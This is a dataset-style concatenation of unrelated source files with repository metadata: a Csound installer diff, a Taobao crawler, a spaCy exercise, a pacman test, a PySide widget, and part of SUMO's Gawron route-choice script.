installErrors = installErrors or err
err = installFile('installer/misc/vim/csound.vim',
@@ -420,71 +420,31 @@
'%s/%s' % (vimDir, 'syntax'))
installErrors = installErrors or err
-# create uninstall script
-
-print ' === Installing uninstall script ==='
-fileList += [concatPath([prefix, md5Name])]
-fileList += [concatPath([binDir, 'uninstall-csound5'])]
-try:
- f = open(concatPath([instDir, binDir, 'uninstall-csound5']), 'w')
- print >> f, '#!/bin/sh'
- print >> f, ''
- for i in fileList:
- print >> f, 'rm -f "%s"' % i
- print >> f, ''
- print >> f, '/sbin/ldconfig > /dev/null 2> /dev/null'
- print >> f, ''
- f.close()
- os.chmod(concatPath([instDir, binDir, 'uninstall-csound5']), 0755)
- addMD5(concatPath([instDir, binDir, 'uninstall-csound5']),
- concatPath([binDir, 'uninstall-csound5']))
- print ' %s' % concatPath([binDir, 'uninstall-csound5'])
-except:
- print ' *** Error creating uninstall script'
- installErrors = 1
-
-# save MD5 checksums
-
-print ' === Installing MD5 checksums ==='
-try:
- f = open(concatPath([instDir, prefix, md5Name]), 'w')
- print >> f, md5List,
- f.close()
- os.chmod(concatPath([instDir, prefix, md5Name]), 0644)
- print ' %s' % concatPath([prefix, md5Name])
-except:
- print ' *** Error installing MD5 checksums'
- installErrors = 1
-
-
# -----------------------------------------------------------------------------
-print ''
+print('')
# check for errors
if installErrors:
- print ' *** Errors occured during installation, deleting files...'
+ print(' *** Errors occured during installation, deleting files...')
for i in fileList:
try:
os.remove(concatPath([instDir, i]))
except:
pass
else:
- print 'Csound installation has been successfully completed.'
- print 'Before running Csound, make sure that the following environment'
- print 'variables are set:'
+ print('Csound installation has been successfully completed.')
+ print('Before running Csound, make sure that the following environment')
+ print('variables are set:')
if not useDouble:
- print ' OPCODEDIR=%s' % pluginDir32
+ print(' OPCODEDIR=%s' % pluginDir32)
else:
- print ' OPCODEDIR64=%s' % pluginDir64
- print ' CSSTRNGS=%s' % xmgDir
+ print(' OPCODEDIR64=%s' % pluginDir64)
+ print(' CSSTRNGS=%s' % xmgDir)
if '%s/libstk.so' % pluginDir in fileList:
- print ' RAWWAVE_PATH=%s' % rawWaveDir
- print 'Csound can be uninstalled by running %s/uninstall-csound5' % binDir
-
-if os.getuid() == 0:
- runCmd(['/sbin/ldconfig'])
+ print(' RAWWAVE_PATH=%s' % rawWaveDir)
+ print('Csound can be uninstalled by running %s/uninstall-csound5' % binDir)
-print ''
+print('')
| 33.770308 | 82 | 0.59066 |
8693702852c39352bd17eaf0f2b7cd42ca1c63b4
| 4,301 |
py
|
Python
|
search_good_info_new.py
|
sambabypapapa/CralwerSet
|
a76e0660c42ce7aac20b8d07ccc454b6636a8a2a
|
[
"Apache-2.0"
] | 5 |
2020-08-17T08:37:16.000Z
|
2021-06-07T05:02:05.000Z
|
search_good_info_new.py
|
sambabypapapa/CralwerSet
|
a76e0660c42ce7aac20b8d07ccc454b6636a8a2a
|
[
"Apache-2.0"
] | null | null | null |
search_good_info_new.py
|
sambabypapapa/CralwerSet
|
a76e0660c42ce7aac20b8d07ccc454b6636a8a2a
|
[
"Apache-2.0"
] | 1 |
2021-06-07T05:02:10.000Z
|
2021-06-07T05:02:10.000Z
|
"""
Purpose: crawl all goods in the diversified goods pool;
Environment: python3
Author: 百舸
"""
import requests
import datetime
from requests.packages import urllib3
import json
import CralwerSet.connect_mysql as connect_mysql
import threading
import time
import CralwerSet.schedule as schedule
import pymysql
import CralwerSet.badou_essay_list_crawl as badou_essay_list_crawl
def comment(sc):
# while True:
# try:
conn = connect_mysql.w_shark_erp()
cur = conn.cursor()
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3724.8 Safari/537.36'}
isNew7 = False
while True:
try:
info = sc.pop()
except IndexError:
cur.close()
conn.close()
return
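        # page through the Taobao search results 25 items at a time via the 's' offset parameter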
for i in range(0, 2500, 25):
url = f'https://kxuan.taobao.com/searchSp.htm?data-key=s&data-value=25&ajax=true&_ksTS=1575682938492_769&callback=jsonp770&ruletype=2&bcoffset=2&navigator=all&nested=we&is_spu=0&1=1&ntoffset=0&s={i}&kxuan_swyt_item=37662&cat={info[0]}&searchtype=item&uniq=pid&id=4525&enginetype=0&bcoffset=2&ntoffset=0'
while True:
try:
page_text = requests.get(url=url, headers=header, verify=False).text
break
except Exception as e:
print(e)
continue
string = page_text.split("(", 1)[1][:-1]
result = json.loads(string)
goods = result['mods']['itemlist']['data']['auctions']
goods_info = []
for good in goods:
if int(good['nid']) in have_list:
continue
                isNew7 = False  # reset for every item so one match does not leak into the next
                icon = []
                for each in good['icon']:
                    icon.append({"icon_key": each['icon_key'], "innerText": each['innerText'], "position": each['position']})
                    if each['innerText'] == '营销':
                        isNew7 = True
                have_list.append(int(good['nid']))
                if not isNew7:
                    continue
try:
sameStyleCount = good['sameStyleCount']
except KeyError:
sameStyleCount = 0
goods_info.append((info[2], good['nid'], good['raw_title'], good['detail_url'],
good['view_sales'].strip('人付款'), json.dumps(icon, ensure_ascii=False), good['nick'],
good['shopLink'], good['q_score'], good['pic_url'],
good['view_price'], json.dumps(good["shopcard"]), sameStyleCount))
while True:
try:
sql = "insert into cm_commodity_new (CLASSIFY_ID, URL_ID,TITLE,URL,SALES,CREATE_DATE,ICON,NICK,SHOPLINK,Q_SCORE,PIC_URL,PRICE,SHOPCARD,SAMESTYLECOUNT) values (%s,%s,%s,%s,%s,NOW(),%s,%s,%s,%s,%s,%s,%s,%s);"
num = cur.executemany(sql, goods_info)
conn.commit()
                    print(info[1], i - 25, '-', i, datetime.datetime.now(), 'updated', num, 'rows')
break
except pymysql.err.OperationalError:
                    print('Connection attempt failed: the peer did not respond properly in time or the connected host failed to respond.')
conn.ping(True)
if len(goods) < 25:
break
# except:
# continue
if __name__ == '__main__':
while True:
try:
conn = connect_mysql.w_shark_erp()
cur = conn.cursor()
sql = "select DISTINCT(URL_ID) from cm_commodity_new;"
cur.execute(sql)
have_list = []
for each in cur.fetchall():
have_list.append(each[0])
urllib3.disable_warnings()
Schedule = schedule.schedule('select distinct(ID),cat,MAIN_ID from class_id order by ID desc;',
connect_mysql.w_shark_erp())
thread_list = []
for i in range(6):
thread_list.append(threading.Thread(target=comment, args=(Schedule,)))
for thread in thread_list:
thread.start()
time.sleep(1)
for thread in thread_list:
thread.join()
except:
continue
| 37.72807 | 315 | 0.527087 |
86e3001fd4adfb850bc3a09937532548227d1017
| 906 |
py
|
Python
|
exercises/ja/solution_03_07.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | 2 |
2020-07-07T01:46:37.000Z
|
2021-04-20T03:19:43.000Z
|
exercises/ja/solution_03_07.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/ja/solution_03_07.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
import spacy
from spacy.language import Language
from spacy.matcher import PhraseMatcher
from spacy.tokens import Span
nlp = spacy.load("ja_core_news_sm")
animals = ["ゴールデンレトリバー", "ネコ", "カメ", "ドブネズミ"]
animal_patterns = list(nlp.pipe(animals))
print("動物の一覧: ", animal_patterns)
matcher = PhraseMatcher(nlp.vocab)
matcher.add("ANIMAL", None, *animal_patterns)
# カスタムコンポーネントを定義
@Language.component("animal_component")
def animal_component_function(doc):
    # Apply the matcher to the doc
matches = matcher(doc)
    # Create a Span for each match and give it the label "ANIMAL"
spans = [Span(doc, start, end, label="ANIMAL") for match_id, start, end in matches]
    # Add the matched spans to doc.ents
doc.ents = spans
return doc
# Add the component after the "ner" component
nlp.add_pipe("animal_component", after="ner")
print(nlp.pipe_names)
# Process the text and print the text and label for each entity in doc.ents
doc = nlp("私はネコとゴールデンレトリバーを飼っている。")
print([(ent.text, ent.label_) for ent in doc.ents])
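# Expected output (approximate; exact spans depend on the ja_core_news_sm tokenizer):
# [('ネコ', 'ANIMAL'), ('ゴールデンレトリバー', 'ANIMAL')]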
| 28.3125 | 87 | 0.745033 |
be27fd4c08d298cd50a0a9b327b9a00ec468166e
| 441 |
py
|
Python
|
pacman-arch/test/pacman/tests/remove041.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/remove041.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/remove041.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Remove a no longer needed package (multiple provision)"
lp1 = pmpkg("pkg1")
lp1.provides = ["imaginary"]
self.addpkg2db("local", lp1)
lp2 = pmpkg("pkg2")
lp2.provides = ["imaginary"]
self.addpkg2db("local", lp2)
lp3 = pmpkg("pkg3")
lp3.depends = ["imaginary"]
self.addpkg2db("local", lp3)
self.args = "-R %s" % lp1.name
self.addrule("PACMAN_RETCODE=0")
self.addrule("!PKG_EXIST=pkg1")
self.addrule("PKG_EXIST=pkg2")
| 22.05 | 75 | 0.70068 |
07a2db1851d29ca80e67df7768a13848d0db9404
| 1,966 |
py
|
Python
|
packages/geometry/nodes/geometry___PointsField0/widgets/geometry___PointsField0___main_widget.py
|
Shirazbello/Pyscriptining
|
0f2c80a9bb10477d65966faeccc7783f20385c1b
|
[
"MIT"
] | null | null | null |
packages/geometry/nodes/geometry___PointsField0/widgets/geometry___PointsField0___main_widget.py
|
Shirazbello/Pyscriptining
|
0f2c80a9bb10477d65966faeccc7783f20385c1b
|
[
"MIT"
] | null | null | null |
packages/geometry/nodes/geometry___PointsField0/widgets/geometry___PointsField0___main_widget.py
|
Shirazbello/Pyscriptining
|
0f2c80a9bb10477d65966faeccc7783f20385c1b
|
[
"MIT"
] | null | null | null |
# from PySide2.QtWidgets import ...
from PySide2.QtCore import Qt
from PySide2.QtGui import QPixmap, QPainter, QPen, QColor, QBrush
from PySide2.QtWidgets import QWidget, QVBoxLayout, QLabel
import random
class PointsField_NodeInstance_MainWidget(QWidget):
def __init__(self, parent_node_instance):
super(PointsField_NodeInstance_MainWidget, self).__init__()
# leave these lines ------------------------------
self.parent_node_instance = parent_node_instance
# ------------------------------------------------
self.setStyleSheet('''
background-color: #333333;
''')
self.setLayout(QVBoxLayout())
self.label = QLabel()
pix = QPixmap(200,200)
self.label.setPixmap(pix)
self.layout().addWidget(self.label)
self.resize(200, 200)
self.points = []
def randomize(self, num_points):
self.points.clear()
for i in range(num_points):
x = random.randint(0, self.label.pixmap().width())
y = random.randint(0, self.label.pixmap().height())
self.points.append({'x': x, 'y': y})
self.draw_points(self.points)
return self.points
def draw_points(self, points):
painter = QPainter(self.label.pixmap())
painter.setRenderHint(QPainter.Antialiasing)
painter.setPen(QPen('#333333'))
painter.setBrush(QColor('#333333'))
painter.drawRect(self.rect())
pen = QPen(QColor(255, 255, 255))
painter.setPen(pen)
painter.setBrush(QBrush(Qt.white))
for p in points:
painter.drawEllipse(p['x'], p['y'], 4, 4)
self.repaint()
def get_data(self):
return {'points': self.points}
def set_data(self, data):
self.points = data['points']
self.draw_points(self.points)
# optional - important for threading - stop everything here
def removing(self):
pass
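# Rough usage sketch (assumes a running QApplication; the parent node
# instance is supplied by the host editor and is not used directly here):
#
#   w = PointsField_NodeInstance_MainWidget(parent_node_instance=None)
#   pts = w.randomize(50)    # scatter and draw 50 random points
#   state = w.get_data()     # {'points': [...]} for serialization
#   w.set_data(state)        # restore and redraw the same points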
| 27.690141 | 67 | 0.5941 |
ed63d4d83c087e768a6ffc8f116f1047c1b8ba40
| 23,069 |
py
|
Python
|
Co-Simulation/Sumo/sumo-1.7.0/tools/assign/routeChoices.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 4 |
2020-11-13T02:35:56.000Z
|
2021-03-29T20:15:54.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/assign/routeChoices.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 9 |
2020-12-09T02:12:39.000Z
|
2021-02-18T00:15:28.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/assign/routeChoices.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 1 |
2020-11-20T19:31:26.000Z
|
2020-11-20T19:31:26.000Z
|
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2007-2020 German Aerospace Center (DLR) and others.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# https://www.eclipse.org/legal/epl-2.0/
# This Source Code may also be made available under the following Secondary
# Licenses when the conditions for such availability set forth in the Eclipse
# Public License 2.0 are satisfied: GNU General Public License, version 2
# or later which is available at
# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html
# SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later
# @file routeChoices.py
# @author Evamarie Wiessner
# @author Yun-Pang Floetteroed
# @author Michael Behrisch
# @date 2007-02-27
"""
This script calculates route choice probabilities based on different methods.
- Gawron
- step-size (TBD)
- ......
"""
from __future__ import absolute_import
from __future__ import print_function
import os
import random
import math
from xml.sax import handler
from xml.sax import parse
class Vehicle:
def __init__(self, label, depart, departlane='first', departpos='base', departspeed=0):
self.label = label
self.CO_abs = 0.
self.CO2_abs = 0.
self.HC_abs = 0.
self.PMx_abs = 0.
self.NOx_abs = 0.
self.fuel_abs = 0.
self.routesList = []
# self.speed = 0.
self.depart = float(depart)
self.departlane = departlane
self.departpos = departpos
self.departspeed = departspeed
self.selectedRoute = None
class Edge:
def __init__(self, label):
self.label = label
self.length = 0.
self.freespeed = 0.
self.CO_abs = 0.
self.CO2_abs = 0.
self.HC_abs = 0.
self.PMx_abs = 0.
self.NOx_abs = 0.
self.fuel_abs = 0.
self.traveltime = 0.
self.CO_perVeh = 0.
self.CO2_perVeh = 0.
self.HC_perVeh = 0.
self.PMx_perVeh = 0.
self.NOx_perVeh = 0.
self.fuel_perVeh = 0.
# only one veh on the edge
self.fuel_perVeh_default = 0.
self.CO_perVeh_default = 0.
self.CO2_perVeh_default = 0.
self.HC_perVeh_default = 0.
self.PMx_perVeh_default = 0.
self.NOx_perVeh_default = 0.
self.fuel_perVeh_default = 0.
self.freetraveltime = 0.
pathNum = 0
class Route:
def __init__(self, edges):
global pathNum
self.label = "%s" % pathNum
pathNum += 1
self.edges = edges
# self.ex_probability = None
self.probability = 0.
self.selected = False
self.ex_cost = 0.
self.act_cost = 0.
class netReader(handler.ContentHandler):
def __init__(self, edgesList, edgesMap):
self._edgesList = edgesList
self._edgesMap = edgesMap
self._edgeObj = None
def startElement(self, name, attrs):
if name == 'edge' and 'function' not in attrs:
if attrs['id'] not in self._edgesMap:
self._edgeObj = Edge(attrs['id'])
self._edgesList.append(self._edgeObj)
self._edgesMap[attrs['id']] = self._edgeObj
if self._edgeObj and name == 'lane':
self._edgeObj.length = float(attrs['length'])
self._edgeObj.freespeed = float(attrs['speed'])
self._edgeObj.freetraveltime = self._edgeObj.length / \
self._edgeObj.freespeed
def endElement(self, name):
if name == 'edge':
self._edgeObj = None
class addweightsReader(handler.ContentHandler):
def __init__(self, edgesList, edgesMap):
self._edgesList = edgesList
self._edgesMap = edgesMap
self._edgObj = None
def startElement(self, name, attrs):
if name == 'edge':
if attrs['id'] in self._edgesMap:
self._edgeObj = self._edgesMap[attrs['id']]
if 'traveltime' in attrs:
self._edgeObj.freetraveltime = float(attrs['traveltime'])
if 'CO_perVeh' in attrs:
self._edgeObj.CO_perVeh_default = float(attrs['CO_perVeh'])
if 'CO2_perVeh' in attrs:
self._edgeObj.CO2_perVeh_default = float(attrs['CO2_perVeh'])
if 'HC_perVeh' in attrs:
self._edgeObj.HC_perVeh_default = float(attrs['HC_perVeh'])
if 'PMx_perVeh' in attrs:
self._edgeObj.PMx_perVeh_default = float(attrs['PMx_perVeh'])
if 'NOx_perVeh' in attrs:
self._edgeObj.NOx_perVeh_default = float(attrs['NOx_perVeh'])
if 'fuel_perVeh' in attrs:
self._edgeObj.fuel_perVeh_default = float(attrs['fuel_perVeh'])
if 'fuel_abs' in attrs:
self._edgeObj.fuel_abs_default = float(attrs['fuel_abs'])
if 'NOx_abs' in attrs:
self._edgeObj.NOx_abs_default = float(attrs['NOx_abs'])
if 'PMx_abs' in attrs:
self._edgeObj.PMx_abs_default = float(attrs['PMx_abs'])
if 'HC_abs' in attrs:
self._edgeObj.HC_abs_default = float(attrs['HC_abs'])
if 'CO2_abs' in attrs:
self._edgeObj.CO2_abs_default = float(attrs['CO2_abs'])
if 'CO_abs' in attrs:
self._edgeObj.CO_abs_default = float(attrs['CO_abs'])
class routeReader(handler.ContentHandler):
def __init__(self, vehList, vehMap):
self._vehList = vehList
self._vehMap = vehMap
self._vehObj = None
self._routObj = None
def startElement(self, name, attrs):
if name == 'vehicle':
if ('departPos' in attrs):
self._vehObj = Vehicle(attrs['id'], attrs['depart'], attrs[
'departLane'], attrs['departPos'], attrs['departSpeed'])
else:
self._vehObj = Vehicle(attrs['id'], attrs['depart'])
self._vehMap[attrs['id']] = self._vehObj
self._vehList.append(self._vehObj)
if self._vehObj and name == 'route':
edgesList = attrs['edges'].split(' ')
self._routObj = Route(" ".join(edgesList))
self._vehObj.routesList.append(self._routObj)
def endElement(self, name):
if name == 'vehicle':
self._vehObj = None
self._routObj = None
class vehrouteReader(handler.ContentHandler):
def __init__(self, vehList, vehMap, edgesMap, fout, foutrout, ecoMeasure, alpha, beta):
self._vehList = vehList
self._vehMap = vehMap
self._edgesMap = edgesMap
self._fout = fout
self._foutrout = foutrout
self._ecoMeasure = ecoMeasure
self._newroutesList = []
self._alpha = alpha
self._beta = beta
self._vehObj = None
self._routObj = None
self._selected = None
self._currentSelected = None
self._count = 0
self._existed = False
def startElement(self, name, attrs):
if name == 'vehicle':
self._vehObj = self._vehMap[attrs['id']]
if self._vehObj and name == 'routeDistribution':
self._currentSelected = attrs['last']
if self._vehObj and name == 'route':
if self._count == int(self._currentSelected):
self._vehObj.selectedRouteEdges = attrs['edges']
self._count += 1
for r in self._vehObj.routesList:
if r.edges == attrs['edges']:
self._existed = True
self._routObj = r
break
if not self._existed:
self._routObj = Route(attrs['edges'])
self._vehObj.routesList.append(self._routObj)
if 'probability' in attrs:
self._routObj.probability = float(attrs['probability'])
if self._routObj.probability == 0.0:
# check with Micha if there is a better way to avoid the
# prob. = 0.
self._routObj.probability = 1.02208127529e-16
if 'cost' in attrs:
self._routObj.ex_cost = float(attrs['cost'])
for e in self._routObj.edges.split(' '):
eObj = self._edgesMap[e]
if self._ecoMeasure != 'fuel' and eObj.traveltime == 0.:
self._routObj.act_cost += eObj.freetraveltime
elif self._ecoMeasure != 'fuel' and eObj.traveltime > 0.:
self._routObj.act_cost += eObj.traveltime
elif self._ecoMeasure == 'fuel' and eObj.fuel_perVeh == 0.:
self._routObj.act_cost += eObj.fuel_perVeh_default
elif self._ecoMeasure == 'fuel' and eObj.fuel_perVeh > 0.:
self._routObj.act_cost += eObj.fuel_perVeh
if self._routObj.ex_cost == 0.:
self._routObj.ex_cost = self._routObj.act_cost
def endElement(self, name):
if name == 'vehicle':
# if len(self._vehObj.routesList) == 1:
# self._vehObj.routesList[0].probability = 1.
# for the routes which are from the sumo's rou.alt.xml file
for r in self._vehObj.routesList:
if r.act_cost == 0.:
for e in r.edges.split(' '):
eObj = self._edgesMap[e]
if self._ecoMeasure != 'fuel' and eObj.traveltime == 0.:
r.act_cost += eObj.freetraveltime
elif self._ecoMeasure != 'fuel' and eObj.traveltime > 0.:
r.act_cost += eObj.traveltime
elif self._ecoMeasure == 'fuel' and eObj.fuel_perVeh == 0.:
r.act_cost += eObj.fuel_perVeh_default
elif self._ecoMeasure == 'fuel' and eObj.fuel_perVeh > 0.:
r.act_cost += eObj.fuel_perVeh
if r.ex_cost == 0.:
r.ex_cost = r.act_cost
                # calculate the probabilities for the new routes
if not r.probability:
r.probability = 1. / float(len(self._vehObj.routesList))
print('new probability for route', r.label,
'for veh', self._vehObj.label)
self._newroutesList.append(r)
            # adjust the probabilities of the existing routes due to the new
# routes
if len(self._newroutesList) > 0:
addProb = 0.
origProbSum = 0.
for r in self._vehObj.routesList:
if r in self._newroutesList:
addProb += r.probability
else:
origProbSum += r.probability
for r in self._vehObj.routesList:
if r not in self._newroutesList:
r.probability = r.probability / \
origProbSum * (1. - addProb)
# update the costs of routes not used by the driver
for r in self._vehObj.routesList:
if r.edges != self._vehObj.selectedRouteEdges:
r.act_cost = self._beta * r.act_cost + \
(1. - self._beta) * r.ex_cost
            # calculate the route choice probabilities based on Gawron
# todo: add "one used route to all routes"
for r1 in self._vehObj.routesList:
for r2 in self._vehObj.routesList:
if r1.label != r2.label:
gawron(r1, r2, self._alpha)
# decide which route will be selected
randProb = random.random()
if len(self._vehObj.routesList) == 1:
self._vehObj.routesList[0].probability = 1.
self._selected = 0
else:
cumulatedProbs = 0.
for i, r in enumerate(self._vehObj.routesList):
cumulatedProbs += r.probability
if cumulatedProbs >= randProb:
self._selected = i
break
# generate the *.rou.xml
self._foutrout.write(' <vehicle id="%s" depart="%.2f" departLane="%s" departPos="%s" departSpeed="%s">\n'
% (self._vehObj.label, self._vehObj.depart, self._vehObj.departlane,
self._vehObj.departpos, self._vehObj.departspeed))
self._foutrout.write(
' <route edges="%s"/>\n' % self._vehObj.routesList[self._selected].edges)
self._foutrout.write(' </vehicle> \n')
# generate the *.rou.alt.xml
self._fout.write(' <vehicle id="%s" depart="%.2f" departLane="%s" departPos="%s" departSpeed="%s">\n'
% (self._vehObj.label, self._vehObj.depart, self._vehObj.departlane,
self._vehObj.departpos, self._vehObj.departspeed))
self._fout.write(
' <routeDistribution last="%s">\n' % self._selected)
for route in self._vehObj.routesList:
self._fout.write(' <route cost="%.4f" probability="%s" edges="%s"/>\n' % (
route.act_cost, route.probability, route.edges))
self._fout.write(' </routeDistribution>\n')
self._fout.write(' </vehicle> \n')
self._newroutesList = []
self._vehObj = None
self._selected = None
self._currentSelected = None
self._count = 0
if name == 'route':
self._routObj = None
if (name == 'route-alternatives' or name == 'routes'):
self._fout.write('</route-alternatives>\n')
self._fout.close()
self._foutrout.write('</routes>\n')
self._foutrout.close()
class dumpsReader(handler.ContentHandler):
def __init__(self, edgesList, edgesMap):
self._edgesList = edgesList
self._edgeObj = None
self._edgesMap = edgesMap
def startElement(self, name, attrs):
if name == 'edge':
if attrs['id'] not in self._edgesMap:
self._edgeObj = Edge(attrs['id'])
self._edgesList.append(self._edgeObj)
self._edgesMap[attrs['id']] = self._edgeObj
else:
self._edgeObj = self._edgesMap[attrs['id']]
if 'traveltime' in attrs:
self._edgeObj.traveltime = float(attrs['traveltime'])
if 'CO_perVeh' in attrs:
self._edgeObj.CO_perVeh = float(attrs['CO_perVeh'])
if 'CO2_perVeh' in attrs:
self._edgeObj.CO2_perVeh = float(attrs['CO2_perVeh'])
if 'HC_perVeh' in attrs:
self._edgeObj.HC_perVeh = float(attrs['HC_perVeh'])
if 'PMx_perVeh' in attrs:
self._edgeObj.PMx_perVeh = float(attrs['PMx_perVeh'])
if 'NOx_perVeh' in attrs:
self._edgeObj.NOx_perVeh = float(attrs['NOx_perVeh'])
if 'fuel_perVeh' in attrs:
self._edgeObj.fuel_perVeh = float(attrs['fuel_perVeh'])
if 'fuel_abs' in attrs:
self._edgeObj.fuel_abs = float(attrs['fuel_abs'])
if 'NOx_abs' in attrs:
self._edgeObj.NOx_abs = float(attrs['NOx_abs'])
if 'PMx_abs' in attrs:
self._edgeObj.PMx_abs = float(attrs['PMx_abs'])
if 'HC_abs' in attrs:
self._edgeObj.HC_abs = float(attrs['HC_abs'])
if 'CO2_abs' in attrs:
self._edgeObj.CO2_abs = float(attrs['CO2_abs'])
if 'CO_abs' in attrs:
self._edgeObj.CO_abs = float(attrs['CO_abs'])
def endElement(self, name):
if name == 'edge':
self._edgeObj = None
def resetEdges(edgesMap):
for eid in edgesMap:
e = edgesMap[eid]
e.traveltime = 0.
e.CO_abs = 0.
e.CO2_abs = 0.
e.HC_abs = 0.
e.PMx_abs = 0.
e.NOx_abs = 0.
e.fuel_abs = 0.
e.CO_perVeh = 0.
e.CO2_perVeh = 0.
e.HC_perVeh = 0.
e.PMx_perVeh = 0.
e.NOx_perVeh = 0.
e.fuel_perVeh = 0.
# check with Micha
def getRouteChoices(edgesMap, dumpfile, routeAltfile, netfile, addWeightsfile, alpha, beta, step, ecoMeasure=None):
random.seed(42) # check with micha
edgesList = []
vehList = []
vehMap = {}
print('run getRouteChoices')
print('ecoMeasure:', ecoMeasure)
outputPath = os.path.abspath(routeAltfile)
outputPath = os.path.dirname(outputPath)
prefix = os.path.basename(routeAltfile)
# prefix = prefix[:prefix.find('.')]
prefix = prefix[:-12]
# print('outputPath:', outputPath)
print('prefix:', prefix)
outputAltfile = os.path.join(outputPath, prefix + '.rou.galt.xml')
outputRoufile = os.path.join(outputPath, prefix + '.grou.xml')
if len(edgesMap) == 0:
try:
print('parse network file')
parse(netfile, netReader(edgesList, edgesMap))
except AttributeError:
print("could not parse netfile: " + str(netfile))
try:
parse(addWeightsfile, addweightsReader(edgesList, edgesMap))
except AttributeError:
print("could not parse weights file: " + str(addWeightsfile))
else:
resetEdges(edgesMap)
fout = open(outputAltfile, 'w')
foutrout = open(outputRoufile, 'w')
fout.write('<?xml version="1.0"?>\n')
fout.write('<!--\n')
fout.write('route choices are generated with use of %s' %
os.path.join(os.getcwd(), 'routeChoices.py'))
fout.write('-->\n')
fout.write('<route-alternatives>\n')
foutrout.write('<?xml version="1.0"?>\n')
foutrout.write('<!--\n')
foutrout.write('route choices are generated with use of %s' %
os.path.join(os.getcwd(), 'routeChoices.py'))
foutrout.write('-->\n')
foutrout.write('<routes>')
print('parse dumpfile')
print(dumpfile)
parse(dumpfile, dumpsReader(edgesList, edgesMap))
# parse routeAltfile from SUMO
try:
print('parse routeAltfile:', routeAltfile)
parse(routeAltfile, routeReader(vehList, vehMap))
except IOError:
print('could not parse routeAltfile:', routeAltfile)
ex_outputAltFile = prefix[
:prefix.rfind('_')] + '_%03i' % (step - 1) + '.rou.galt.xml'
try:
print('parse routeAltfile from externalGawron: ', ex_outputAltFile)
parse(ex_outputAltFile, vehrouteReader(
vehList, vehMap, edgesMap, fout, foutrout, ecoMeasure, alpha, beta))
except IOError:
print('could not parse routeAltfile from externalGawron:', ex_outputAltFile)
return outputRoufile, edgesMap
def gawron(r1, r2, alpha):
a = alpha
delta = (r2.act_cost - r1.act_cost) / (r1.act_cost + r2.act_cost)
g = math.exp(a * delta / (1 - delta * delta))
ex_prob = r1.probability
r1.probability = (r1.probability * (r1.probability + r2.probability) *
g) / (r1.probability * g + r2.probability) # check together with Eva
r2.probability = ex_prob + r2.probability - r1.probability
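# Illustrative sketch of one Gawron update (values below are assumptions,
# not part of the SUMO pipeline): starting from equal probabilities, the
# cheaper route gains probability mass and the two still sum to 1.
#
#   r_fast, r_slow = Route('a b'), Route('a c')
#   r_fast.act_cost, r_slow.act_cost = 100., 150.
#   r_fast.probability = r_slow.probability = 0.5
#   gawron(r_fast, r_slow, alpha=0.5)
#   # now r_fast.probability > 0.5 and
#   # r_fast.probability + r_slow.probability == 1.0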
def calFirstRouteProbs(dumpfile, sumoAltFile, addweights, ecoMeasure=None):
basename = sumoAltFile.split('_')[0]
outputAltFile = basename + "_001.rou.galt.xml"
outputRouFile = basename + "_001.rou.alt.xml"
edgesList = []
edgesMap = {}
vehList = []
vehMap = {}
# parse(netfile, netReader(edgesList, edgesMap))
parse(addweights, addweightsReader(edgesList, edgesMap))
parse(dumpfile, dumpsReader(edgesList, edgesMap))
parse(sumoAltFile, routeReader(vehList, vehMap))
fout = open(outputAltFile, 'w')
foutrout = open(outputRouFile, 'w')
fout.write('<?xml version="1.0"?>\n')
fout.write('<!--\n')
fout.write('route choices are generated with use of %s' %
os.path.join(os.getcwd(), 'routeChoices.py'))
fout.write('-->\n')
fout.write('<route-alternatives>\n')
foutrout.write('<?xml version="1.0"?>\n')
foutrout.write('<!--\n')
foutrout.write('route choices are generated with use of %s' %
os.path.join(os.getcwd(), 'routeChoices.py'))
foutrout.write('-->\n')
foutrout.write('<routes>')
for v in vehMap:
vehObj = vehMap[v]
for r in vehObj.routesList:
for e in r.edges.split(' '):
eObj = edgesMap[e]
if ecoMeasure != 'fuel' and eObj.traveltime == 0.:
r.act_cost += eObj.freetraveltime
r.ex_cost += eObj.freetraveltime
elif ecoMeasure != 'fuel' and eObj.traveltime > 0.:
r.act_cost += eObj.traveltime
r.ex_cost += eObj.freetraveltime
elif ecoMeasure == 'fuel' and eObj.fuel_perVeh == 0.:
r.act_cost += eObj.fuel_perVeh_default
r.ex_cost += eObj.fuel_perVeh_default
elif ecoMeasure == 'fuel' and eObj.fuel_perVeh > 0.:
r.act_cost += eObj.fuel_perVeh
r.ex_cost += eObj.fuel_perVeh
costSum = 0.
for r in vehObj.routesList:
costSum += r.ex_cost
for r in vehObj.routesList:
r.ex_probability = r.ex_cost / costSum
randProb = random.random()
selected = 0
if len(vehObj.routesList) > 1:
cumulatedProbs = 0.
for i, r in enumerate(vehObj.routesList):
cumulatedProbs += r.ex_probability
